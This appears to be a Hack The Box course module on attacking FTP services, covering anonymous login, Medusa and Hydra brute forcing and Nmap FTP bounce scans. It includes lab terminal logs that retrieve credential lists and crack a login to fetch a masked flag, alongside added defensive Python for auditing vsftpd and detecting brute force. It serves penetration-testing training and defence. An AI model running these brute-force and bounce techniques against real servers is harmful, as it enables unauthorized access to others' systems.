The File Transfer Protocol (FTP) is a standard network protocol used to transfer files between computers. It also supports directory and file operations, such as changing the working directory, listing files, and renaming and deleting directories or files. By default, FTP listens on TCP port 21.
To attack an FTP server, we can abuse misconfigurations or excessive privileges, exploit known vulnerabilities, or discover new ones. After gaining access to the FTP service, we need to review the contents of its directories so we can search for sensitive or critical information, as we previously discussed. The protocol is designed to trigger downloads and uploads with commands, so files can be transferred between servers and clients. The user is presented with a file management system of the kind familiar from the operating system: files can be stored in folders, which may themselves be located in other folders, resulting in a hierarchical directory structure. Most companies use this service for software or website development processes.
Enumeration
Nmap's default scripts (-sC) include the ftp-anon script, which checks whether an FTP server allows anonymous logins. The version enumeration flag -sV provides interesting information about FTP services, such as the FTP banner, which often includes the version name. We can use the ftp client or nc to interact with the FTP service. By default, FTP runs on TCP port 21.
As we discussed, anonymous authentication can be configured for different services such as FTP. To log in anonymously, we can use the anonymous username and no password. This is dangerous for the company if read and write permissions have not been set up correctly for the FTP service, because the company could have stored sensitive information in a folder that the anonymous user of the FTP service can access.
This would enable us to download this sensitive information or even upload dangerous scripts. Using other vulnerabilities, such as path traversal in a web application, we would be able to find out where this file is located and execute it as PHP code, for example.
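From the defender's side, the risk described above can be checked in the server configuration. The following is an added example, not part of the original module: it assumes the server is vsftpd and audits a vsftpd.conf for anonymous read and write exposure; the sample configuration is constructed.

```python
# Added example: audit vsftpd.conf for risky anonymous-access settings.
# Compiled-in vsftpd defaults for the directives checked here. Note that
# anonymous_enable defaults to YES when the directive is absent.
DEFAULTS = {
    "anonymous_enable": "YES",
    "write_enable": "NO",
    "anon_upload_enable": "NO",
    "anon_mkdir_write_enable": "NO",
    "anon_other_write_enable": "NO",
    "anon_world_readable_only": "YES",
}
ANON_WRITE_KEYS = ("anon_upload_enable", "anon_mkdir_write_enable",
                   "anon_other_write_enable")

# Constructed sample configuration (not taken from a real host).
SAMPLE_CONF = """\
listen=YES
anonymous_enable=YES
write_enable=YES
anon_upload_enable=YES
anon_mkdir_write_enable=NO
"""

def parse_conf(text):
    """Parse 'option=value' lines; '#' starts a comment line."""
    settings = dict(DEFAULTS)
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)
        settings[key.strip().lower()] = value.strip()
    return settings

def audit(text):
    """Return a list of findings about anonymous access."""
    settings = parse_conf(text)
    def on(key):
        return settings.get(key, "NO").upper() == "YES"
    if not on("anonymous_enable"):
        return []
    findings = ["anonymous login is enabled"]
    writable = [k for k in ANON_WRITE_KEYS if on(k)]
    if on("write_enable") and writable:   # anon_* writes need write_enable too
        findings.append("anonymous users can write: " + ", ".join(writable))
    if not on("anon_world_readable_only"):
        findings.append("anonymous users can download files that are not world-readable")
    return findings

if __name__ == "__main__":
    print("\n".join(audit(SAMPLE_CONF)) or "no anonymous exposure found")
```

An empty configuration still reports anonymous login as enabled, because that is vsftpd's default when the directive is missing.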
Anonymous Authentication
Once we get access to an FTP server with anonymous credentials, we can start searching for interesting information. We can use the commands ls and cd to move around directories like in Linux. To download a single file, we use get, and to download multiple files, we can use mget. For upload operations, we can use put for a single file or mput for multiple files. We can use help in the FTP client session for more information.
In the Footprinting module, we cover detailed information about possible misconfigurations of such services. For example, many different settings can be applied to an FTP server, and some of them lead to different options that could cause possible attacks against that service. However, this module will focus on specific attacks rather than finding individual misconfigurations.
Protocol-Specific Attacks
Many different attacks and methods are protocol-based. However, it is essential to note that we are not attacking the individual protocols themselves but the services that use them. Since there are dozens of services for a single protocol and they process the corresponding information differently, we will look at some.
Brute Forcing
If there is no anonymous authentication available, we can also brute-force the login for the FTP service using pre-generated lists of usernames and passwords. There are many different tools to perform a brute-forcing attack. Let us explore one of them, Medusa. With Medusa, we can use the option -u to specify a single user to target, or the option -U to provide a file with a list of usernames. The option -P is for a file containing a list of passwords. We use the option -M to specify the protocol we are targeting (FTP) and the option -h for the target hostname or IP address.
Note: Although we may find services vulnerable to brute force, most applications today prevent these types of attacks. A more effective method is Password Spraying.
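Brute forcing and password spraying look different in the server's authentication log. The following added example (not from the original module) flags both patterns per client IP; it assumes vsftpd's native log format, and the log lines and client addresses are constructed.

```python
import re
from collections import defaultdict, deque
from datetime import datetime, timedelta

# Failed-login entries in the assumed vsftpd log format.
FAIL_RE = re.compile(
    r'^(?P<ts>\w{3} \w{3} [ \d]\d \d\d:\d\d:\d\d \d{4}) \[pid \d+\] '
    r'\[(?P<user>[^\]]*)\] FAIL LOGIN: Client "(?P<ip>[^"]+)"'
)

def detect(lines, window=timedelta(seconds=60), max_fail=5, max_users=3):
    """Map each offending client IP to 'brute-force' or 'password-spray'.

    Lines are assumed to be in chronological order; thresholds are illustrative.
    """
    recent = defaultdict(deque)   # ip -> (timestamp, user) failures inside the window
    alerts = {}
    for line in lines:
        m = FAIL_RE.match(line)
        if not m:
            continue              # successful logins and other entries are ignored
        ts = datetime.strptime(m["ts"], "%a %b %d %H:%M:%S %Y")
        ip, q = m["ip"], recent[m["ip"]]
        q.append((ts, m["user"]))
        while ts - q[0][0] > window:
            q.popleft()           # drop failures that fell out of the window
        users = {user for _, user in q}
        if len(users) >= max_users:
            alerts[ip] = "password-spray"         # failures spread over many accounts
        elif len(q) >= max_fail:
            alerts.setdefault(ip, "brute-force")  # many failures, few accounts
    return alerts

# Constructed sample log: fiona and robin are usernames from this page,
# every other value is invented for the example.
SAMPLE_LOG = (
    [f'Thu Feb 12 08:59:{s:02d} 2026 [pid 4101] [fiona] FAIL LOGIN: Client "10.10.14.5"'
     for s in range(10, 16)]
    + [f'Thu Feb 12 09:00:{10 * i:02d} 2026 [pid 4200] [{u}] FAIL LOGIN: Client "10.10.14.9"'
       for i, u in enumerate(["fiona", "robin", "kate", "admin"])]
    + ['Thu Feb 12 09:05:00 2026 [pid 4300] [robin] FAIL LOGIN: Client "10.10.14.20"',
       'Thu Feb 12 09:05:04 2026 [pid 4300] [robin] OK LOGIN: Client "10.10.14.20"']
)

if __name__ == "__main__":
    for ip, kind in detect(SAMPLE_LOG).items():
        print(ip, kind)
```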
Brute Forcing with Medusa
FTP Bounce Attack
An FTP bounce attack is a network attack that uses FTP servers to deliver outbound traffic to another device on the network. The attacker uses a PORT command to trick the FTP connection into running commands and getting information from a device other than the intended server.
Consider that we are targeting an FTP server, FTP_DMZ, exposed to the internet. Another device within the same network, Internal_DMZ, is not exposed to the internet. We can use the connection to the FTP_DMZ server to scan Internal_DMZ using the FTP bounce attack and obtain information about the server's open ports. Then, we can use that information as part of our attack against the infrastructure.
The Nmap -b flag can be used to perform an FTP bounce attack:
Modern FTP servers include protections that, by default, prevent this type of attack, but if these features are misconfigured, the server can become vulnerable to an FTP bounce attack.
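The protection mentioned above comes down to validating the address and port a client supplies in PORT. The following added example (not from the original module, and not any particular server's code) shows that check; the control-connection peer 10.10.14.5 is a constructed value, and 172.17.0.2 port 80 is the bounce target from this page's Nmap output.

```python
import ipaddress

def parse_port_arg(arg):
    """Decode the PORT argument 'h1,h2,h3,h4,p1,p2' (RFC 959) into (ip, port)."""
    parts = arg.strip().split(",")
    if len(parts) != 6 or not all(
        p.isascii() and p.isdigit() and int(p) <= 255 for p in parts
    ):
        raise ValueError(f"malformed PORT argument: {arg!r}")
    nums = [int(p) for p in parts]
    ip = ipaddress.IPv4Address(".".join(str(n) for n in nums[:4]))
    return ip, nums[4] * 256 + nums[5]

def check_port_command(peer_ip, arg):
    """Decide whether a server should honour a PORT command.

    peer_ip is the client address of the control connection. Following the
    guidance in RFC 2577, the data connection may only go back to that same
    host and never to a port below 1024.
    """
    try:
        ip, port = parse_port_arg(arg)
    except ValueError as exc:
        return False, str(exc)
    if ip != ipaddress.IPv4Address(peer_ip):
        return False, f"data address {ip} differs from control peer {peer_ip}"
    if port < 1024:
        return False, f"privileged data port {port}"
    return True, "ok"

if __name__ == "__main__":
    peer = "10.10.14.5"  # constructed client address
    for arg in ("10,10,14,5,195,80",   # client's own address, port 50000
                "172,17,0,2,0,80",     # third-party host, as in a bounce scan
                "10,10,14,5,0,80",     # own address but privileged port
                "10,10,14,5,80"):      # malformed
        print(arg, "->", check_port_command(peer, arg))
```

The same function can be run over a protocol-level command log to flag PORT requests that a permissive server accepted.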
What port is the FTP service running on?
Scan the target:
What username is available for the FTP server?
Enumerate anonymous's files:
Using the credentials obtained earlier, retrieve the flag.txt file. Submit the contents as your answer.
Use hydra to crack credentials:
Use the credentials to connect with ftp and get the flag:
0xH4shDumb@htb[/htb]$ ftp 192.168.2.142
Connected to 192.168.2.142.
220 (vsFTPd 2.3.4)
Name (192.168.2.142:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 9 Aug 12 16:51 test.txt
226 Directory send OK.
0xH4shDumb@htb[/htb]$ medusa -u fiona -P /usr/share/wordlists/rockyou.txt -h 10.129.203.7 -M ftp
Medusa v2.2 [http://www.foofus.net] (C) JoMo-Kun / Foofus Networks <jmk@foofus.net>
ACCOUNT CHECK: [ftp] Host: 10.129.203.7 (1 of 1, 0 complete) User: fiona (1 of 1, 0 complete) Password: 123456 (1 of 14344392 complete)
ACCOUNT CHECK: [ftp] Host: 10.129.203.7 (1 of 1, 0 complete) User: fiona (1 of 1, 0 complete) Password: 12345 (2 of 14344392 complete)
ACCOUNT CHECK: [ftp] Host: 10.129.203.7 (1 of 1, 0 complete) User: fiona (1 of 1, 0 complete) Password: 123456789 (3 of 14344392 complete)
ACCOUNT FOUND: [ftp] Host: 10.129.203.7 User: fiona Password: family [SUCCESS]
0xH4shDumb@htb[/htb]$ nmap -Pn -v -n -p80 -b anonymous:password@10.10.110.213 172.17.0.2
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-27 04:55 EDT
Resolved FTP bounce attack proxy to 10.10.110.213 (10.10.110.213).
Attempting connection to ftp://anonymous:password@10.10.110.213:21
Connected:220 (vsFTPd 3.0.3)
Login credentials accepted by FTP server!
Initiating Bounce Scan at 04:55
FTP command misalignment detected ... correcting.
Completed Bounce Scan at 04:55, 0.54s elapsed (1 total ports)
Nmap scan report for 172.17.0.2
Host is up.
PORT STATE SERVICE
80/tcp open http
<SNIP>
H4sh@Dumb /workspace ▸ nmap -sCV -F -T4 10.129.203.6
Starting Nmap 7.93 ( https://nmap.org ) at 2026-02-12 08:48 CET
Stats: 0:00:12 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 60.00% done; ETC: 08:48 (0:00:08 remaining)
Stats: 0:00:21 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 80.00% done; ETC: 08:48 (0:00:05 remaining)
Stats: 0:01:00 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 92.50% done; ETC: 08:49 (0:00:01 remaining)
Nmap scan report for 10.129.203.6
Host is up (0.069s latency).
Not shown: 95 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 7108b0c4f3ca9757649770f9fec50c7b (RSA)
| 256 45c3b51463993d9eb32251e59776e150 (ECDSA)
|_ 256 2ec2416646efb68195d5aa3523945538 (ED25519)
53/tcp open domain ISC BIND 9.16.1 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.16.1-Ubuntu
139/tcp open netbios-ssn Samba smbd 4.6.2
445/tcp open netbios-ssn Samba smbd 4.6.2
2121/tcp open ftp
| fingerprint-strings:
| GenericLines:
| 220 ProFTPD Server (InlaneFTP) [10.129.203.6]
| Invalid command: try being more creative
| Invalid command: try being more creative
| NULL:
|_ 220 ProFTPD Server (InlaneFTP) [10.129.203.6]
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| smb2-security-mode:
| 311:
|_ Message signing enabled but not required
|_nbstat: NetBIOS name: ATTCSVC-LINUX, NetBIOS user: <unknown>, NetBIOS MAC: 000000000000 (Xerox)
| smb2-time:
| date: 2026-02-12T07:48:54
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 71.72 seconds
H4sh@Dumb /workspace ▸ TARGET=10.129.203.6
H4sh@Dumb /workspace ▸ ftp "$TARGET" 2121
Connected to 10.129.203.6.
220 ProFTPD Server (InlaneFTP) [10.129.203.6]
Name (10.129.203.6:root): anonymous
331 Anonymous login ok, send your complete email address as your password
Password:
230 Anonymous access granted, restrictions apply
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||19486|)
150 Opening ASCII mode data connection for file list
-rw-r--r-- 1 ftp ftp 1959 Apr 19 2022 passwords.list
-rw-rw-r-- 1 ftp ftp 72 Apr 19 2022 users.list
226 Transfer complete
ftp> get users.list
local: users.list remote: users.list
229 Entering Extended Passive Mode (|||13587|)
150 Opening BINARY mode data connection for users.list (72 bytes)
72 153.85 KiB/s
226 Transfer complete
72 bytes received in 00:00 (1.08 KiB/s)
ftp> get passwords.list
local: passwords.list remote: passwords.list
229 Entering Extended Passive Mode (|||25162|)
150 Opening BINARY mode data connection for passwords.list (1959 bytes)
1959 3.32 MiB/s
226 Transfer complete
1959 bytes received in 00:00 (28.41 KiB/s)
ftp> exit
221 Goodbye.
H4sh@Dumb /workspace ▸ hydra -L users.list -P passwords.list -s "$PORT" ftp://"$TARGET"
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-02-12 08:59:11
[DATA] max 16 tasks per 1 server, overall 16 tasks, 2750 login tries (l:11/p:250), ~172 tries per task
[DATA] attacking ftp://10.129.203.6:2121/
[STATUS] 256.00 tries/min, 256 tries in 00:01h, 2494 to do in 00:10h, 16 active
[2121][ftp] host: 10.129.203.6 login: robin password: xxxxxxxxxxxxxxx
H4sh@Dumb /workspace ▸ ftp "$TARGET" 2121
Connected to 10.129.203.6.
220 ProFTPD Server (InlaneFTP) [10.129.203.6]
Name (10.129.203.6:root): robin
331 Password required for robin
Password:
230 User robin logged in
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
229 Entering Extended Passive Mode (|||22224|)
150 Opening ASCII mode data connection for file list
-rw-rw-r-- 1 robin robin 27 Apr 18 2022 flag.txt
226 Transfer complete
ftp> get flag.txt
local: flag.txt remote: flag.txt
229 Entering Extended Passive Mode (|||21668|)
150 Opening BINARY mode data connection for flag.txt (27 bytes)
27 55.39 KiB/s
226 Transfer complete
27 bytes received in 00:00 (0.38 KiB/s)
ftp> exit
221 Goodbye.
H4sh@Dumb /workspace ▸ cat flag.txt
HTB{xxxxxxxxx_xxx_xxxxxxx}